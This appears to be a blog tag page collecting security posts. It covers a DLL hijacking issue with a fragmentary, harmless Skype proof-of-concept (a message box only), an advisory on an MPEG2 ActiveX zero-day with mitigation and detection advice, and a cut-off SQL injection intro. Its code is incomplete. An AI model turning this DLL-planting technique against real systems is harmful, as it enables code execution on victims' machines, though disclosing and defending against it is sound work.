Posts Tagged ‘vulnerability’

Have you already heard about the DLL pre-loading/hijacking problem which effects more than 200 Windows applications? This vulnerability is triggered when a vulnerable file type is opened from within a directory controlled by the attacker!

HD Moore (Metasploit) explains the problem and adds a *scanner* into the metasploit framework. Please read his blog entry here (tool for scanning the local machine)


glafkos from Astalavista is now publishing exploit codes for various vulnerable file types:
* Skype
* Adobe Illustrator
* Adobe InDesign
* Adobe OnLocation
* Adobe Premium Pro
* Firefox <= 3.6.8
* Teamviewer

======== EXAMPLE OF A POC (SKYPE) ===============================
Exploit Title: Skype <= DLL Hijacking Exploit (wab32.dll)
Date: August 25, 2010
Author: Glafkos Charalambous (glafkos[@]astalavista[dot]com)
Version: Latest Skype v4.2.0.169
Tested on: Windows 7 x64 Ultimate
Vulnerable extensions: .skype
Greetz: Astalavista, OffSEC, Exploit-DB
Notes: Create folders %commonprogramfiles%\system and place wab32.dll
       %commonprogramfiles(x86)% on x64 bit */
#include <windows.h>
#define DllExport __declspec (dllexport)
            HANDLE    hinstDLL,
            DWORD     fdwReason,
            LPVOID    lpvReserved)
  return 0;
int dll_hijack()
  MessageBox(0, "Skype DLL Hijacking!", "DLL Message", MB_OK);
  return 0;


On July 6th, 2009 a zero day vulnerability in a component of the Windows operating system controlling
MPEG2 videos became publicly distributed. The attack code is currently present on several malware
servers in Asia and being used to infect unwitting clients who have been redirected to these servers. This
vulnerability will allow the remote control of clients who are pushed to malicious web servers via XSS or
phishing techniques. Microsoft has not issued a patch for this vulnerability, but they have recommended a
common workaround for dealing with ActiveX vulnerabilities which we have included below under
‘Recommended Preventative Actions’. Only older versions of Windows (2000, XP, 2003) are vulnerable to
this, as Vista and later operating systems have architecture which prevents the vulnerable code from being
exposed to the malicious control object. Major IDS/IPS/AV vendors have released signatures to detect
exploits against this vulnerability.

Severity: MEDIUM

We consider this to be a ‘medium’ severity event. We have not, to this date, seen high infection ratesamongst our monitored networks, but vendors are just now releasing signatures to detect the exploit comingback from a malicious webserver to a vulnerable client. This exploit is not related to any worms, but isbeing used to install Trojan software which may then perform additional attacks on vulnerable hosts viaother exploit vectors. While normally we would give ActiveX exploits a low severity, there over the past 18months there have been a proliferation of SQL Injection attacks resulting in legitimate ASP.NET sitesunwittingly serving up malicious javascript, that ‘trusting’ the intention of a site is no longer prudent forsurfing behavior We feel the multitude of the hacked web environments hosting up active pages with malicious javascript inclusions, coupled with newer methods of attack obfuscation, added to the knowledgethat MPEG2 is an EXTREMELY popular media format justifies this severity.

How to Determine Whether You Are Vulnerable:

All 2003 and XP systems will be vulnerable to this unless specific actions have been taken to:
[1] Disable ActiveX altogether (not recommended in many environments)
[2] Are not using Internet Explorer at all
[3] Disabled Windows Media Software by some 3rd party application
[4] Have updated A/V software which detects the attack and mitigates it
[5] Have set the kill-bit for ActiveX Control Object (CLSID 0955AC62-BF2E-4CBA-A2B9-
[6] Perform an automated Scan on hosts that are in the Windows 2003/XP tranche of Operating Systems.

Recommended Preventive Actions:

Oddly, Microsoft has discovered that no ActiveX control objects which interface with MSvidctl.dll are
needed by Internet Explorer. On Windows XP and 2003 systems they may all be safely disabled by using
the tool Microsoft provides for at URL: Later systems such as
Windows Vista, 2008, v7 do not appear to be vulnerable.

How to Detect Potential Attacks:

Intrusion Detection Systems which have recently come out withsignatures to detect some facet of this attempted exploit. We are currently investigating efficacy of these signatures and will be updating managed and monitored devices according.
Tipping Point
Popular Antivirus Software are detecting attacks as ‘JS/Exploit.CVE-2008-0015.A.Gen trojan

What to do if You Have Been Attacked:

Typically workstations, laptops and desktops running XP or 2003 are the ones likely to fall victim to this
type of attack. Recommend consulting your security policy for the Incident Response
procedure as it pertains to the asset which is compromised. Infection should be considered serious, and
Windows MSRT may or may not be enough to remove the Trojan Software that the attacker has installed.

Detailed Analysis:

From Microsoft:
Customers who are using Windows Vista or Windows Server 2008 are not affected because the
ability to pass data to this control within Internet Explorer has been restricted.
By default, Internet Explorer on Windows Server 2003 and 2008 runs in a restricted mode that is
known as Enhanced Security Configuration. Enhanced Security Configuration is a group of
preconfigured settings in Internet Explorer that can reduce the likelihood of a user or administrator
downloading and running specially crafted Web content on a server. This is a mitigating factor for
Web sites that you have not added to the Internet Explorer Trusted sites zone. See also Managing
Internet Explorer Enhanced Security Configuration.
By default, all supported versions of Microsoft Outlook and Microsoft Outlook Express open
HTML e-mail messages in the Restricted sites zone. The Restricted sites zone helps mitigate
attacks that could try to exploit this vulnerability by preventing Active Scripting and ActiveX
controls from being used when reading HTML e-mail messages. However, if a user clicks a link in
an e-mail message, the user could still be vulnerable to exploitation of this vulnerability through
the Web-based attack scenario.
In a Web-based attack scenario, an attacker could host a Web site that contains a Web page that is
used to exploit this vulnerability. In addition, compromised Web sites and Web sites that accept or
host user-provided content or advertisements could contain specially crafted content that could
exploit this vulnerability. In all cases, however, an attacker would have no way to force users to
visit these Web sites. Instead, an attacker would have to persuade users to visit the Web site,
typically by getting them to click a link in an e-mail message or Instant Messenger message that
takes users to the attacker’s Web site.
An attacker who successfully exploited this vulnerability could gain the same user rights as the
local user. Users whose accounts are configured to have fewer user rights on the system could be
less impacted than users who operate with administrative user rights.

Suggested Reading:

Microsoft has developed a new security offering called HELLOSECUREWORLD.COM. It is a program to engage developers in a fun and exciting way to build knowledge around security in application development. In addition, developers can share information about secure coding for today’s internet-based computing environment. The program features an array of online and offline customer activities ranging from MSDN events, to security virtual labs, to video presentations on a new website.


* XSS (Cross Site Scripting)
* SQLi (SQL Injection)
* Canonicalization Attack
* CSRF (Cross Site Request Forgery)
* Integer Overflow/Underflow
* Etc…

To access the labs go to: HelloSecureWorld

-Introducing The SQL Injection Vuln:
.SQL injection attacks are known also as SQL insertion
it’s in the form of executing some querys in the database and getting acces to informations (SQL Vesion, Number & Names of tables and columns,some authentification infos,ect…)